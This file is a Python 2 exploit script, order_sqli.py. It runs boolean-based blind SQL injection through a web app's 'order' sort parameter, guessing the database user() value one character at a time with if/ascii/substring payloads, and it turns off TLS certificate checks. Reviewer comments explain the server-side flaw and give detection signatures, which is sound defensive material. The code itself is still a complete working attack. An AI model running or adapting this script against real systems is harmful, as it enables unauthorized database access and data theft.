order_sqli.py
#!/usr/bin/env python
# coding=utf-8
# The injection point is located after ORDER BY (the `order` request parameter).
import re
import sys
import warnings
import requests
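# Boolean-based blind SQL injection probe against an ORDER BY clause (Python 2).
#
# What the script does: it appends a conditional expression to the `order`
# query parameter and uses the presence of the marker string "pdTypeName" in
# the response to decide whether one character of the database user() value
# equals a guessed ASCII code. Matching characters are collected in `key`.
#
# Reviewer notes (defensive):
# * Root cause on the server side: the `order` value reaches the ORDER BY
#   clause as raw SQL. Sort column and sort direction cannot be bound as
#   query parameters, so they have to be checked against a fixed allow-list
#   (known column names, "asc"/"desc") before the statement is built.
# * Detection: one run issues up to 21 * 199 = 4179 GET requests that differ
#   only in two integers inside `order`, and each carries `if(`, `ascii(`,
#   `substring(` and `information_schema` in a sort parameter. Both the
#   volume and the keywords are usable WAF / log signatures.
# * The fixed, outdated Safari 5.1 User-Agent below is another stable
#   indicator for log searches.

# Silence every Python warning. Together with verify=False further down this
# hides the InsecureRequestWarning raised for each request: TLS certificate
# validation is disabled for the whole run.
warnings.filterwarnings("ignore")

# Python 2 only: reload(sys) re-exposes setdefaultencoding so the process-wide
# default encoding can be switched to UTF-8 (presumably for the non-ASCII
# status line printed at the end).
reload(sys)
sys.setdefaultencoding('utf-8')

headers = {
    "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
}

# Characters recovered so far, in order.
key = ""

# Outer loop: character position inside user(), 1-based, positions 1..21.
for position in range(1, 22, 1):
    # Inner loop: candidate ASCII code for that position, 1..199.
    for code in range(1, 200, 1):
        # The `order` parameter becomes: asc,if(<char == code>,1,<subquery>).
        # NOTE(review): the false branch selects from information_schema.tables,
        # which presumably returns more than one row and makes the statement
        # fail, so the normal listing is missing from the response — confirm.
        url = "https://test.com/index.php?page=1&rows=5&sort=pdType&order=asc,if(ascii(substring(user(),"+str(position)+",1))="+str(code)+",1,(select 1 from information_schema.tables))"
        req = requests.get(url, headers=headers, timeout=10, verify=False)
        # Membership test replaces `find(...) is not -1`: comparing an int with
        # `is` only works through CPython's small-integer caching and is not a
        # value comparison.
        if "pdTypeName" in req.text:
            key += chr(code)
            break
    # If no code matched, nothing is appended and the next position is tried.

# "用户名" means "username". Parenthesised form prints the same text on Python 2.
print("用户名:"+key)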